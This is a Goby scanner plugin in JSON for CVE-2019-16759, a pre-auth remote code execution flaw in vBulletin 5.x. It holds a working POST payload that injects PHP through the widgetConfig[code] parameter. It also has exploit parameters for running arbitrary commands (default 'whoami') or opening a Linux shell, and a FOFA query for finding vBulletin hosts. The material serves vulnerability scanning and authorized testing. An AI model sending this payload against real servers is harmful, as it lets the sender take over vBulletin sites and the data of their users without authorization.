{
  "Name": "vBulletin 5.x RCE (CVE-2019-16759)",
  "Description": "vBulletin 5.x through 5.5.4 allows remote command execution via the widgetConfig[code] parameter in an ajax/render/widget_php routestring request.",
  "Product": "vBulletin",
  "Homepage": "https://www.vbulletin.com/",
  "DisclosureDate": "2019-09-24",
  "Author": "gobysec@gmail.com",
  "GifAddress": "https://raw.githubusercontent.com/gobysec/GobyVuls/master/vBulletin/CVE-2019-16759/CVE-2019-16759.gif",
  "FofaQuery": "app=vBulletin",
  "GobyQuery": "app=vBulletin",
  "Level": "3",
  "Impact": "This issue may lead to Remote Code execution.",
  "Recommendation": "",
  "References": [
    "http://packetstormsecurity.com/files/154623/vBulletin-5.x-0-Day-Pre-Auth-Remote-Command-Execution.html",
    "http://packetstormsecurity.com/files/154648/vBulletin-5.x-Pre-Auth-Remote-Code-Execution.html",
    "http://packetstormsecurity.com/files/155633/vBulletin-5.5.4-Remote-Command-Execution.html",
    "https://arstechnica.com/information-technology/2019/09/public-exploit-code-spawns-mass-attacks-against-high-severity-vbulletin-bug/",
    "https://seclists.org/fulldisclosure/2019/Sep/31",
    "https://www.theregister.co.uk/2019/09/24/vbulletin_vbug_zeroday/",
    "https://nvd.nist.gov/vuln/detail/CVE-2019-16759",
    "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-16759"
  ],
  "HasExp": true,
  "ExpParams": [{
                  "name": "AttackType",
                  "type": "select",
                  "value": "cmd,goby_shell_linux"
            },{
                  "name": "cmd",
                  "type": "input",
                  "value": "whoami",
					"show": "AttackType=cmd"
            }],
  "ExpTips": {
    "Type": "",
    "Content": ""
  },
  "ScanSteps": [
    "AND",
    {
      "Request": {
        "data": "routestring=ajax%2Frender%2Fwidget_php&widgetConfig%5Bcode%5D=echo+md5%28%27vBulletin%27%29%3B+exit%3B",
        "data_type": "text",
        "follow_redirect": true,
        "method": "POST",
		"header": {"Content-Type":"application/x-www-form-urlencoded"},
        "uri": "/index.php?routestring=ajax/render/widget_php"
      },
      "ResponseTest": {
        "checks": [
          {
            "bz": "",
            "operation": "contains",
            "type": "item",
            "value": "be4ea51d962be8308a0099ae1eb3ec63",
            "variable": "$body"
          }
        ],
        "operation": "AND",
        "type": "group"
      }
    }
  ],
  "ExploitSteps": null,
  "Tags": ["rce"],
  "CVEIDs": [
    "CVE-2019-16759"
  ],
  "CVSSScore": "9.8",
  "AttackSurfaces": {
    "Application": ["vBulletin"],
    "Support": null,
    "Service": null,
    "System": null,
    "Hardware": null
  }
}